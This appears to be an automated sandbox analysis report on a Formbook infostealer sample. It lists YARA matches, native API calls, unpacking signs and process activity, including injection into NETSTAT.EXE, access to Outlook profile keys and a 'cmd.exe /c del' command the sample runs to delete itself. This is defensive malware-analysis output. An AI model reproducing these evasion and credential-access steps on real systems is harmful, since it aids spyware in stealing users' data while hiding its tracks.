          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00440CB8 NtdllDefWindowProc_A,GetCapture,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045BA98 NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045C240 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045C2F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042A524 NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00450C40 GetSubMenu,SaveDC,RestoreDC,7344B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417940 NtCreateFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004179F0 NtReadFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417A70 NtClose,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417B20 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004178FA NtCreateFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041793A NtCreateFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004179EA NtReadFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AFB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AFA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AFAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9560 NtWriteFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AF9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D87A70 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D87B20 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D879F0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D87940 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D878FA NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D879EA NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D8793A NtCreateFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00450C40
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00455F90
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00401026
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_0041B10C
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00408A50
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_0041BB67
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_0041ADA4
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_0041BF77
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AE20A0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B820A8
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00ACB090
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B828EC
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B8E824
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B71002
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AD4120
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00ABF900
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B822AE
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AEEBB0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B7DBD2
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B703DA
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B82B28
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AC841F
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B7D466
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AE2581
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00ACD5E0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B825DD
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AB0D20
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B82D07
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B81D55
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B82EF7
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00AD6E30
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B7D616
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 1_2_00B81FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D78A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D8BB67
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D8B10C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D72FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D8BF77
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D8AD9D
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D72D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Code function: 5_2_02D72D87
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: String function: 00403FC0 appears 68 times
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: String function: 00ABB150 appears 45 times
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: String function: 004060D4 appears 62 times
          Source: mp0nMsMroT.exe  Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exe  Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exe  Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exe, 00000000.00000002.184868899.0000000002140000.00000002.00000001.sdmp  Binary or memory string: OriginalFilenameuser32j% vs mp0nMsMroT.exe
          Source: mp0nMsMroT.exe, 00000000.00000002.184880166.0000000002150000.00000002.00000001.sdmp  Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs mp0nMsMroT.exe
          Source: mp0nMsMroT.exe, 00000001.00000002.232810465.0000000000D3F000.00000040.00000001.sdmp  Binary or memory string: OriginalFilenamentdll.dllj% vs mp0nMsMroT.exe
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine  Classification label: mal100.troj.spyw.evad.winEXE@7/0@14/9
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0041DDA8 GetLastError,FormatMessageA,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00408606 GetDiskFreeSpaceA,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_004137F4 FindResourceA,
          Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts
          Source: mp0nMsMroT.exe  Virustotal: Detection: 47%
          Source: mp0nMsMroT.exe  ReversingLabs: Detection: 79%
          Source: unknown  Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknown  Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknown  Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknown  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: wntdll.pdbUGP source: mp0nMsMroT.exe, 00000001.00000002.232510703.0000000000A90000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mp0nMsMroT.exe, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Unpacked PE file: 1.2.mp0nMsMroT.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_004265C8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_004482AC push 00448339h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00416038 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0045E088 push 0045E0B4h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00448244 push 004482AAh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00426224 push 00426250h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_004263D0 push 004263FCh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00436418 push 00436444h; ret
